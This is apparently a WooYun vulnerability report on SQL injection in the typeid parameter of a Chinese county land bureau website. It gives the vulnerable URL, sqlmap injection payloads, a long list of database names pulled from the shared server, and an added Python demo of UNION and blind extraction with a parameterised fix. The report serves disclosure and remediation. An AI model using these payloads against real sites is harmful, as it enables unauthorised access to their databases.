
Vulnerability overview

Defect ID: wooyun-2014-058350

Title: SQL injection vulnerability in the website of Yanjin County Bureau of Land and Resources (延津县国土资源局)

Affected vendor: 延津县国土资源局 (Yanjin County Bureau of Land and Resources)

Author: bitcoin

Submitted: 2014-04-25 11:45

Fix time: 2014-06-09 11:46

Published: 2014-06-09 11:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-04-25: Details sent to the vendor; awaiting vendor handling
2014-04-30: Vendor confirmed; details disclosed to the vendor only
2014-05-10: Details disclosed to core white hats and relevant domain experts
2014-05-20: Details disclosed to regular white hats
2014-05-30: Details disclosed to intern white hats
2014-06-09: Details disclosed to the public

Brief description:

SQL injection in the website of Yanjin County Bureau of Land and Resources (延津县国土资源局).

Detailed description:

Injection point:
http://www.yjxgtj.gov.cn/lm.php?typeid=14
The typeid parameter is placed into the SQL query without proper validation or escaping, which allows injection.
Running sqlmap against it:
Place: GET
Parameter: typeid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: typeid=14 AND 3406=3406
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: typeid=-5365 UNION ALL SELECT NULL,CONCAT(0x717a78575a594848,0x7169756371),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: typeid=14 AND SLEEP(5)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0.11
[00:05:08] [INFO] fetching database names
[00:05:15] [INFO] the SQL query used returns 1829 entries
[00:05:15] [INFO] retrieved: "information_schema"
[00:05:16] [INFO] retrieved: "91zxyy"
[00:05:16] [INFO] retrieved: "abcdeft"
[00:05:16] [INFO] retrieved: "acqz"
[00:05:16] [INFO] retrieved: "ada"
[00:05:16] [INFO] retrieved: "adys"
[00:05:17] [INFO] retrieved: "ajls"
[00:05:17] [INFO] retrieved: "anboqizhong"
[00:05:17] [INFO] retrieved: "anda"
[00:05:17] [INFO] retrieved: "anda_huiyuan"
[00:05:17] [INFO] retrieved: "anda_mfy"
[00:05:18] [INFO] retrieved: "anhuidq"
[00:05:18] [INFO] retrieved: "anj"
[00:05:18] [INFO] retrieved: "annm"
[00:05:18] [INFO] retrieved: "antaijt"
[00:05:18] [INFO] retrieved: "anxin"
[00:05:19] [INFO] retrieved: "aokai"
[00:05:19] [INFO] retrieved: "aoxin"
[00:05:19] [INFO] retrieved: "apmcweihua"
[00:05:19] [INFO] retrieved: "aq_data"
[00:05:19] [INFO] retrieved: "axnjxl"
[00:05:20] [INFO] retrieved: "aybaihe"
[00:05:20] [INFO] retrieved: "aybhsj"
[00:05:20] [INFO] retrieved: "aycjthj"
[00:05:20] [INFO] retrieved: "ayclqm"
[00:05:20] [INFO] retrieved: "aycpwz"
[00:05:21] [INFO] retrieved: "aycwly"
[00:05:21] [INFO] retrieved: "aydlky"
[00:05:21] [INFO] retrieved: "aydryj"
[00:05:21] [INFO] retrieved: "ayfk"
[00:05:21] [INFO] retrieved: "ayfrsm"
[00:05:22] [INFO] retrieved: "ayfsdhb"
[00:05:22] [INFO] retrieved: "ayfsdjx"
[00:05:22] [INFO] retrieved: "ayfuda"
[00:05:22] [INFO] retrieved: "ayfytx"
[00:05:22] [INFO] retrieved: "ayfzm"
[00:05:23] [INFO] retrieved: "aygfny"
[00:05:23] [INFO] retrieved: "aygjjs"
[00:05:23] [INFO] retrieved: "aygl"
[00:05:23] [INFO] retrieved: "aygrwz"
[00:05:23] [INFO] retrieved: "aygtgt"
[00:05:24] [INFO] retrieved: "aygxsm"
[00:05:24] [INFO] retrieved: "ayhayy"
[00:05:24] [INFO] retrieved: "ayhcbz"
[00:05:24] [INFO] retrieved: "ayhfgy"
[00:05:39] [INFO] retrieved: "ayhpkj"
[00:05:39] [INFO] retrieved: "ayhtqsm"
[00:05:39] [INFO] retrieved: "ayhuayu"
[00:05:40] [INFO] retrieved: "ayhxgc"
[00:05:40] [INFO] retrieved: "ayhxjc"
[00:05:40] [INFO] retrieved: "ayjc"
[00:05:40] [INFO] retrieved: "ayjdgt"
[00:05:40] [INFO] retrieved: "ayjjhq"
[00:05:41] [INFO] retrieved: "ayjljx"
[00:05:41] [INFO] retrieved: "ayjlsw"
[00:05:41] [INFO] retrieved: "ayjsdsm"
[00:05:41] [INFO] retrieved: "ayjuding"
[00:05:42] [INFO] retrieved: "ayjxsb"
[00:05:42] [INFO] retrieved: "ayjxyjs"
[00:05:42] [INFO] retrieved: "ayjxyjseng"
[00:05:42] [INFO] retrieved: "ayjydq"
[00:05:42] [INFO] retrieved: "ayjysl"
[00:05:43] [INFO] retrieved: "ayjywz"
[00:05:43] [INFO] retrieved: "aykaidi"
[00:05:43] [INFO] retrieved: "aykbltl"
[00:05:43] [INFO] retrieved: "ayldsh"
[00:05:43] [INFO] retrieved: "aylhyj"
[00:05:44] [INFO] retrieved: "aylyxg"
[00:05:44] [INFO] retrieved: "aymgy"
[00:05:44] [INFO] retrieved: "aymswy"
[00:05:44] [INFO] retrieved: "aypjtxw"
[00:05:44] [INFO] retrieved: "ayptf"
[00:05:45] [INFO] retrieved: "aypymy"
[00:05:45] [INFO] retrieved: "ayqitian"
[00:05:45] [INFO] retrieved: "ayqs"
[00:05:45] [INFO] retrieved: "ayrfjxc"
[00:05:45] [INFO] retrieved: "ayrysm"
[00:05:46] [INFO] retrieved: "ayshgt"
[00:05:46] [INFO] retrieved: "ayshsm"
[00:05:46] [INFO] retrieved: "ayshuangzheng"
[00:05:46] [INFO] retrieved: "ayslfs"
[00:05:46] [INFO] retrieved: "aysxqc"
[00:05:47] [INFO] retrieved: "aysysm"
[00:05:47] [INFO] retrieved: "aysywz"
[00:05:47] [INFO] retrieved: "aytcjn"
[00:05:47] [INFO] retrieved: "aythkt"
[00:05:47] [INFO] retrieved: "aywqqz"
[00:05:48] [INFO] retrieved: "aywsgt"
[00:05:48] [INFO] retrieved: "aywtjx"
[00:05:48] [INFO] retrieved: "ayxinyuan"
[00:05:48] [INFO] retrieved: "ayxsjx"
[00:05:49] [INFO] retrieved: "ayxys"
[00:05:49] [INFO] retrieved: "ayybnj"
[00:05:49] [INFO] retrieved: "ayyh"
[00:05:49] [INFO] retrieved: "ayyhdj"
[00:05:49] [INFO] retrieved: "ayyhwz"
[00:05:50] [INFO] retrieved: "ayyihai"
[00:05:50] [INFO] retrieved: "ayyxwz"
[00:05:50] [INFO] retrieved: "ayyxxs"
[00:05:50] [INFO] retrieved: "ayzhongke"
[00:05:50] [INFO] retrieved: "ayzlgy"
[00:05:51] [INFO] retrieved: "ayzxqc"
[00:05:51] [INFO] retrieved: "ayzzgy"
[00:05:51] [INFO] retrieved: "ayzzyy"
[00:05:51] [INFO] retrieved: "azfm"
[00:05:51] [INFO] retrieved: "baay"
[00:05:52] [INFO] retrieved: "bafysy"
[00:05:52] [INFO] retrieved: "bajx"
[00:05:52] [INFO] retrieved: "bangzhuta_pig"
[00:05:52] [INFO] retrieved: "bayx"
[00:05:52] [INFO] retrieved: "bbch"
[00:05:53] [INFO] retrieved: "bdf"
[00:05:53] [INFO] retrieved: "bdsl"
[00:05:53] [INFO] retrieved: "bdszn"
[00:05:53] [INFO] retrieved: "bdyl"
[00:05:53] [INFO] retrieved: "beifangjx"
[00:05:54] [INFO] retrieved: "beilite"
[00:05:54] [INFO] retrieved: "bengye"
[00:05:54] [INFO] retrieved: "bfby"
[00:05:54] [INFO] retrieved: "bfjx"
[00:05:54] [INFO] retrieved: "bfnh"
[00:05:55] [INFO] retrieved: "bgzdq"
[00:05:55] [INFO] retrieved: "bhks"
[00:05:55] [INFO] retrieved: "bideli"
[00:05:55] [INFO] retrieved: "bidelieng"
sqlmap reports 1,829 entries in total (these are database names, per the "fetching database names" line above, not tables); the author stopped here rather than enumerate them all. A single web application's MySQL account being able to list this many databases suggests the site sits on a shared database server with many other tenants, so the injection exposes far more than this one bureau's data.

Proof of vulnerability:

As above.

Suggested fix:

Validate typeid as an integer (reject anything else) and pass it to the query as a bound parameter of a prepared statement instead of concatenating it into the SQL string; keyword filtering on its own is not a reliable fix.
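As an added example (not code from the original report or from the yjxgtj.gov.cn site, whose PHP source is not shown), the Python script below reproduces the three things sqlmap's output above demonstrates and the fix recommended here against a constructed in-memory SQLite database: the boolean-based blind probe (`14 AND 3406=3406` versus a false condition), the three-column UNION dump, character-by-character blind extraction of a value, and a hardened lookup that accepts only an integer and binds it as a parameter. The `column_list` and `admin` tables, their contents and the helper names are assumptions; SQLite stands in for the MySQL backend, so MySQL-only constructs in the report (`SLEEP()`, `CONCAT()`, the `#` comment) are replaced with SQLite equivalents.

```python
import re
import sqlite3

# Added example, not code from the report or from the yjxgtj.gov.cn site. The
# schema and rows below are constructed stand-ins for the CMS behind lm.php;
# SQLite replaces the real MySQL backend, so MySQL-only functions (SLEEP(),
# CONCAT(), MID()/ORD(), the '#' comment) are swapped for SQLite equivalents.


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE column_list (typeid INTEGER, name TEXT, template TEXT);
        INSERT INTO column_list VALUES (14, 'Land policy', 'list.html');
        INSERT INTO column_list VALUES (15, 'Notices', 'list.html');
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'constructed-secret');
    """)
    return con


def vulnerable_lookup(con, typeid):
    """The flaw as reported: the raw query-string value is pasted into the SQL text."""
    sql = "SELECT typeid, name, template FROM column_list WHERE typeid=" + typeid
    return con.execute(sql).fetchall()


def boolean_probe(con):
    """sqlmap's first finding: a true and a false tautology yield different pages."""
    true_rows = vulnerable_lookup(con, "14 AND 3406=3406")
    false_rows = vulnerable_lookup(con, "14 AND 3406=3407")
    return len(true_rows), len(false_rows)


def union_dump(con):
    """sqlmap's second finding: a 3-column UNION pulls rows from any other table.
    The leading -5365 makes the original SELECT match nothing, so only the
    injected rows come back. The report's payload wrapped its marker in
    CONCAT(0x..,0x..); SQLite's string concatenation operator is ||."""
    payload = "-5365 UNION ALL SELECT NULL, username || ':' || password, NULL FROM admin"
    return vulnerable_lookup(con, payload)


def oracle(con, condition):
    """One boolean-blind request: does typeid=14 AND (condition) still return rows?"""
    return len(vulnerable_lookup(con, "14 AND (" + condition + ")")) > 0


def blind_extract(con, subquery, max_len=64):
    """Recover a string one character at a time by binary search over its code
    point, which is how boolean-based blind extraction works when no UNION is
    available. MySQL would use ORD(MID((...),pos,1)) instead of unicode(substr())."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: unicode('') is NULL, so every probe fails
            break
        out += chr(lo)
    return out


INT_RE = re.compile(r"-?[0-9]{1,10}")


def hardened_lookup(con, typeid):
    """The fix: accept only an integer, then bind it as a parameter. int() alone
    is too lenient (it accepts ' 14 ' and '1_4'), so the shape is checked first.
    Returns None for rejected input so the caller can answer 400 rather than 500."""
    if not INT_RE.fullmatch(typeid):
        return None
    sql = "SELECT typeid, name, template FROM column_list WHERE typeid=?"
    return con.execute(sql, (int(typeid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("boolean probe (rows for true, rows for false):", boolean_probe(db))
    print("union dump:", union_dump(db))
    print("blind extract:", blind_extract(db, "SELECT username FROM admin WHERE id=1"))
    print("hardened, typeid=14:", hardened_lookup(db, "14"))
    print("hardened, typeid=14 AND 3406=3406:", hardened_lookup(db, "14 AND 3406=3406"))
```

The boolean probe returns one row for the true condition and none for the false one, which is exactly the page difference sqlmap keys on; the blind loop then turns that one bit per request into a full string, so "blind" does not mean "harmless". The hardened lookup rejects every payload from the report before any SQL runs, and the parameter binding means even a well-formed integer cannot change the query's structure.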

Copyright notice: please credit bitcoin@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2014-04-30 09:47

Vendor reply:

CNVD has confirmed and reproduced the described issue; it has been forwarded through CNCERT to the Henan branch centre for handling.

Latest status:

None yet